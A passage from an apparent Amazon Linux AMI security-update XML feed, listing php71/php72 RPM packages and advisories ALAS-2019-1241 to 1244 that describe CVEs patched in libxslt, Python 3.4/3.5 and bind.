arch="x86_64"><filename>Packages/php71-json-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.30-1.40.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.19" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.19-1.14.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.19-1.14.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.19" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.19-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1241</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1241: medium priority package update for libxslt</title><issued date="2019-07-17 23:37:00" /><updated date="2019-07-25 18:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11068:
libxslt through 1.1.33 allows bypass of a protection mechanism because callers of xsltCheckRead and xsltCheckWrite permit access even upon receiving a -1 error code. xsltCheckRead can return -1 for a crafted URL that is not actually invalid and is subsequently loaded.
1709697:
CVE-2019-11068 libxslt: xsltCheckRead and xsltCheckWrite routines security bypass by crafted URL
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11068" title="" id="CVE-2019-11068" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxslt-debuginfo" version="1.1.28" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-debuginfo-1.1.28-5.13.amzn1.x86_64.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python26-1.1.28-5.13.amzn1.x86_64.rpm</filename></package><package name="libxslt" version="1.1.28" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-1.1.28-5.13.amzn1.x86_64.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-python27-1.1.28-5.13.amzn1.x86_64.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="5.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-devel-1.1.28-5.13.amzn1.x86_64.rpm</filename></package><package name="libxslt-devel" version="1.1.28" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-devel-1.1.28-5.13.amzn1.i686.rpm</filename></package><package name="libxslt-python27" version="1.1.28" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python27-1.1.28-5.13.amzn1.i686.rpm</filename></package><package name="libxslt-python26" version="1.1.28" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python26-1.1.28-5.13.amzn1.i686.rpm</filename></package><package name="libxslt" version="1.1.28" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-1.1.28-5.13.amzn1.i686.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.28" release="5.13.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-debuginfo-1.1.28-5.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1242</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1242: medium priority package update for python34</title><issued date="2019-07-17 23:50:00" /><updated date="2019-07-25 18:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9947:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue.
1695572:
CVE-2019-9947 python: improper neutralization of CRLF sequences in urllib module
1695572:
CVE-2019-9947 python: CRLF injection via the path part of the url passed to urlopen()
CVE-2019-9740:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the query string after a ? character) followed by an HTTP header or a Redis command.
1688169:
CVE-2019-9740 python: improper neutralization of CRLF sequences in urllib module
1688169:
CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9740" title="" id="CVE-2019-9740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9947" title="" id="CVE-2019-9947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-libs" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.45.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.45.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.45.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.45.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.45.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.45.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1243</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1243: medium priority package update for python35</title><issued date="2019-07-17 23:51:00" /><updated date="2019-07-25 18:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9947:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue.
1695572:
CVE-2019-9947 python: improper neutralization of CRLF sequences in urllib module
1695572:
CVE-2019-9947 python: CRLF injection via the path part of the url passed to urlopen()
CVE-2019-9740:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the query string after a ? character) followed by an HTTP header or a Redis command.
1688169:
CVE-2019-9740 python: improper neutralization of CRLF sequences in urllib module
1688169:
CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen()
CVE-2019-9636:
Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.
1688543:
CVE-2019-9636 python: Information Disclosure due to urlsplit improper NFKC normalization
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9636" title="" id="CVE-2019-9636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9740" title="" id="CVE-2019-9740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9947" title="" id="CVE-2019-9947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python35-test" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.7-1.22.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.7-1.22.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.7-1.22.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.7-1.22.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.7-1.22.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.7-1.22.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.7-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1244</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1244: important priority package update for bind</title><issued date="2019-07-17 23:52:00" /><updated date="2019-07-25 18:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5743:
A flaw was found in the way bind implemented tunable which limited simultaneous TCP client connections. A remote attacker could use this flaw to exhaust the pool of file descriptors available to named, potentially affecting network connections and the management of files such as log files or zone journal files. In cases where the named process is not limited by OS-enforced per-process limits, this could additionally potentially lead to exhaustion of all available free file descriptors on that system.
1702541:
CVE-2018-5743 bind: Limiting simultaneous TCP clients is ineffective
